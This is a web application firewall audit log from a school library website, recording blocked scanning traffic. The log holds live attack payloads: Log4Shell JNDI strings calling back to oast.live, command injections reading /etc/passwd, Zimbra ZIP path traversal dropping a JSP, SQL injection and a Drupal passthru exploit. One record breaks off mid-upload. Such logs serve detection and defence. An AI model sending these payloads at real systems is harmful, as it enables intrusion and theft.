Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f48973b-Z-- --39b10122-A-- [27/May/2025:03:48:23 +0700] aDTTl96cNBpj1JOkpQk_fQAAAE0 103.236.140.4 55674 103.236.140.4 8181 --39b10122-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168967365 --39b10122-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39b10122-E-- --39b10122-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748292503120054 3170 (- - -) Stopwatch2: 1748292503120054 3170; combined=760, p1=568, p2=131, p3=0, p4=0, p5=61, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39b10122-Z-- --9b8d0b24-A-- [27/May/2025:04:33:19 +0700] aDTeHxLFq2VRfSzm6b8G2QAAAJc 103.236.140.4 36724 103.236.140.4 8181 --9b8d0b24-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0q9cd1gpeook7mlf7sg7tqja1jyicqic.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0q9cd1gpeook7mlf7sgho969p7ie1orz.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0q9cd1gpeook7mlf7sgquptt8jk3wmt5.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgt6qrneumb94we.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sgfyifxe3qyj9an.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sgo8x6sd8njnrab.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sgxt86jbjhmcxsz.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0q9cd1gpeook7mlf7sg6ef6sowy5xzmz.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0q9cd1gpeook7mlf7sgm3bys775z64jj.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sgjxkftbjphzi6o.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgeso7reekmbwho.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sgz8d6w1crusqfh.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgjzges7n7nnur3.oast.live} X-Origin: 
${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgnq9umw5fsqxhm.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgsgmo4y98fm3ou.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0q9cd1gpeook7mlf7sg85ex4ntxbwy4n.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168411311 --9b8d0b24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9b8d0b24-E-- --9b8d0b24-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295199462902 6389 (- - -) Stopwatch2: 1748295199462902 6389; combined=4463, p1=458, p2=3974, p3=0, p4=0, p5=30, sr=84, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b8d0b24-Z-- --c0619217-A-- [27/May/2025:04:33:20 +0700] aDTeIFuSH_Spa4YU2ZmmVwAAAMk 103.236.140.4 36750 103.236.140.4 8181 --c0619217-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/108.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168996447 --c0619217-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --c0619217-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0619217-E-- --c0619217-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748295200103906 1848 (- - -) Stopwatch2: 1748295200103906 1848; combined=517, p1=353, p2=135, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0619217-Z-- --a41ed057-A-- [27/May/2025:04:33:20 +0700] aDTeIN6cNBpj1JOkpQlEbQAAAEU 103.236.140.4 36738 103.236.140.4 8181 --a41ed057-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 168411314 --a41ed057-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --a41ed057-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a41ed057-E-- --a41ed057-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200102998 3143 (- - -) Stopwatch2: 1748295200102998 3143; combined=1690, p1=449, p2=1216, p3=0, p4=0, p5=25, sr=153, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a41ed057-Z-- --d0c1c753-A-- [27/May/2025:04:33:20 +0700] aDTeIN6cNBpj1JOkpQlEbgAAAEM 103.236.140.4 36740 103.236.140.4 8181 --d0c1c753-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168511191 --d0c1c753-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --d0c1c753-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0c1c753-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200102998 3933 (- - -) Stopwatch2: 1748295200102998 3933; combined=2433, p1=317, p2=2097, p3=0, p4=0, p5=19, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0c1c753-Z-- --7f592c16-A-- [27/May/2025:04:33:20 +0700] aDTeIFuSH_Spa4YU2ZmmWQAAAMs 103.236.140.4 36782 103.236.140.4 8181 --7f592c16-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164701893 --7f592c16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f592c16-E-- --7f592c16-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! 
?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200122230 2958 (- - -) Stopwatch2: 1748295200122230 2958; combined=1631, p1=327, p2=1275, p3=0, p4=0, p5=28, sr=96, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f592c16-Z-- --cc62216c-A-- [27/May/2025:04:33:20 +0700] aDTeIBLFq2VRfSzm6b8G3gAAAIQ 103.236.140.4 36788 103.236.140.4 8181 --cc62216c-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166635702 --cc62216c-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ 
Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --cc62216c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc62216c-E-- --cc62216c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200122973 5591 (- - -) Stopwatch2: 1748295200122973 5591; combined=4214, p1=415, p2=3758, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc62216c-Z-- --e1b8bd35-A-- [27/May/2025:04:33:37 +0700] aDTeMRLFq2VRfSzm6b8HCgAAAIw 103.236.140.4 36929 103.236.140.4 8181 --e1b8bd35-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166166633 --e1b8bd35-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M --8aee133b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8aee133b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748296116398941 4237 (- - -) Stopwatch2: 1748296116398941 4237; combined=3129, p1=349, p2=2701, p3=22, p4=21, p5=36, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aee133b-Z-- --a3b29d67-A-- [27/May/2025:04:48:36 +0700] aDThtGTuEZUBy5rh0sZ58QAAAAo 103.236.140.4 43282 103.236.140.4 8181 --a3b29d67-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167871111 --a3b29d67-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --a3b29d67-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3b29d67-E-- --a3b29d67-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296116416277 1576 (- - -) Stopwatch2: 1748296116416277 1576; combined=528, p1=303, p2=201, p3=0, p4=0, p5=24, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3b29d67-Z-- --734c4342-A-- [27/May/2025:04:48:36 +0700] aDThtGTuEZUBy5rh0sZ58gAAAA0 103.236.140.4 43286 103.236.140.4 8181 --734c4342-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160760041 --734c4342-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat 
/etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --734c4342-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --734c4342-E-- --734c4342-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748296116416716 3866 (- - -) Stopwatch2: 1748296116416716 3866; combined=2861, p1=309, p2=2489, p3=19, p4=21, p5=22, sr=59, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --734c4342-Z-- --bfb2d75d-A-- [27/May/2025:04:50:04 +0700] aDTiDGTuEZUBy5rh0sZ5-wAAAAM 103.236.140.4 43882 103.236.140.4 8181 --bfb2d75d-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160760053 --bfb2d75d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bfb2d75d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296204416195 3561 (- - -) Stopwatch2: 1748296204416195 3561; combined=1325, p1=493, p2=802, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
